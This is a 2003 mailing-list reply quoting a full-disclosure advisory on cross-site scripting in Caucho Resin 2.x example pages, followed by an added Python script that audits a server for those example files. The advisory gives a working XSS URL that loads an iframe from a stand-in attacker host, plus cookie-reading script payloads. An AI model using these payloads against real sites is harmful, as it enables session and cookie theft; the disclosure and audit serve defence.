
Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting



Donny,

These are in the example applications, which any sane admin should disable
right away, much like caucho-status.
These are basic procedures in setting up a server.


--jelmer





----- Original Message ----- 
From: "morning_wood" <se_cur_ity@hotmail.com>
To: <full-disclosure@lists.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting


> -----------------------------------------------------------------
>           - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
>                               -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vulnerability(s):
> ----------------
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> -----------------------
> "Resin® is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VULNERABILITY / EXPLOIT
> ======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
> http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi";></iframe>4
> or
>
> <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
>
> the above is only an example, all cookie and session
>  stealing Cross Site Scripting was possible.
>
>
> guestbook.jsp allows persistent XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
>
>
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
>
> Vendor Fix:
> -----------
> Versions 3.x don't have the examples included
>
>
>
> Vendor Contact:
> ---------------
> bugs@caucho.com
> Concurrent with this advisory
>
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@e2-labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

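Added example, not part of either message and not Caucho's code: a small audit an administrator could run over a server's document root to confirm that the example scripts named in the advisory are no longer deployed, which is the step the reply recommends. The document root argument and the directory tree built for the demo are constructed assumptions, not a real Resin layout.

```python
import os
import tempfile

# Script names taken from the advisory (affected scripts plus guestbook.jsp).
ADVISORY_SCRIPTS = {"env.jsp", "form.jsp", "session.jsp",
                    "tictactoe.jsp", "guestbook.jsp"}


def audit_doc_root(doc_root):
    """Return sorted (web_path, under_examples) pairs for advisory-listed
    JSPs found below doc_root. under_examples is True when some parent
    directory is named 'examples', as in the advisory's URL."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(doc_root):
        rel_dir = os.path.relpath(dirpath, doc_root)
        parts = [] if rel_dir == "." else rel_dir.split(os.sep)
        under_examples = any(p.lower() == "examples" for p in parts)
        for name in filenames:
            # Compare case-insensitively: some filesystems ignore case.
            if name.lower() in ADVISORY_SCRIPTS:
                findings.append(("/" + "/".join(parts + [name]), under_examples))
    return sorted(findings)


def build_constructed_tree(root):
    """Create a small constructed tree for the demo; not a real Resin layout."""
    for rel in ("examples/tictactoe/tictactoe.jsp",
                "examples/basic/env.jsp",
                "examples/guestbook/GuestBook.jsp",
                "shop/form.jsp",
                "shop/index.jsp"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<%-- constructed placeholder --%>\n")


def demo():
    """Run the audit over the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_tree(root)
        return audit_doc_root(root)


if __name__ == "__main__":
    for web_path, under_examples in demo():
        label = "example app, remove" if under_examples else "same name, review"
        print(f"{label:22} {web_path}")
```

A hit outside an `examples` directory only shares a file name with an affected script and needs a manual look rather than automatic removal.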